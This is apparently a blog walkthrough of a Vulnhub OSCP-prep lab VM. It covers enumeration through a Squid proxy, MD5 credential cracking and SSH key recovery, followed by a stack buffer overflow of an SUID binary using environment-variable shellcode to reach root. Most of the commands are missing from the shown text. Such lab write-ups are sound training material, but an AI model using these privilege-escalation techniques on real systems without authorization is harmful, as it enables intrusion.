Vulnhub virtual machine; OSCP prep box, pivoting enumeration through separate web-server to engage the target. Buffer-overflow of an application to gain root.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Discover VM on network netdiscover -r 192.168.56.0/24
Target: 192.168.56.117 verified via vm:
this script offers a bit of a change from
nmap and uses
added ip to
(started freaking out on me. Will have to re-attack as to why?!)
looks as if we have two HTTP servers operating on ports
Nmap scan number 2
more of an aggressive scan and found the
Navigating to first port
looks to be forbidden.
Navigating to port
an error page with looks to be some type of application bleed of
ok, looks like we are working with
Stylesheet for Squid Error pages as our application on our web-server
Let move to impersonate a local ip (127.0.0.1) for port
8080 that was refusing connections.
we have just fooled the web-server in thinking the request came from the internal network.
Perform gobuster with a proxy of port
/littlesecrets-main directory discovered.
added the target ip + port as a proxy and navigated to directory.
we have a login page
gobuster enumeration of files
Lets try to enter this login page via
after a bit of time we are able to decode the
the hashes look like md5 and with a quick decryption of them at https://www.md5online.org/md5-decrypt.html we have credentials.
since it looks like we have a
mange hash lets try and SSH to box
search for hidden files:
looks to be an ultrasecret and a note.txt
cat both files:
we have an rsa key (encoded in base64) and the note confirms said rsa key.
decode rsa key
with decoded private key we can now placed the key on our local box
~/.ssh/pinkyv1 and change the
chmod to 600 and connect to pinky ssh with private key.
we are now operating as pinky.
from the home directory we discover this
this binary when executed submits an echo and could be vulnerable to an overflow
attempting to crash binary
segmentation fault - exactly what we were looking for to happen.
This binary also has an SUID bit which will allow us to act as root if executed.
- we need to find where the application crashes
- find the offset
insert our shell code to take advantage of overflow
- location of crash
use gdb to figure out what address application crashes at.
this is a 64-bit architecture based off the different register layout.
rip is at main
we have reached the segmentation fault - application crash. Our next step would be to determine location of frame pointer.
this means that the overflow has occurred at
next, examine the stack pointer
means that “A” exceeded the buffer by 55 times.
examine the “A” sent initially and subtracted 55 from the total
our remaining number and/or offset = 72
re-run gdb with argv of 72 and additional text to ensure we are filling the
$rsp with “a” and taking over the
which is 72 “a”s and “bcdefghi” which should be the “rsp”.
Disassemble the main
we are exploiting this “strcpy” command that is vulnerable to the buffer overflow.
here are our “A”s
here are teh extra bytes we took over the rsp with. We need to inject the shell code into this rsp location!
shellcode payload for x64 systems will result in a shell via push. This is provided by link: http://shell-storm.org/shellcode/files/shellcode-806.php along with exploit-db link: https://www.exploit-db.com/exploits/36858
Leading us to getenv.c
this try to inject an environment variable into the program. Use this script to find an injectable address
Create an variable via export with shellcode from above. In the end this will return the exploit address of the shell code.
see the variable created in env
after compiling the getenv.c to an application we will execute the variable within the application
results in our shellcode being placed at
next, we run the ./adminhelper with our initial payload of “A” and add our return address to our shellcode in little little endian format.
our shellcode executes and successful buffer overflow occurs dropping us into a root shell due to the SUID bit on the
upgrading the shell to full.
Bring me the root!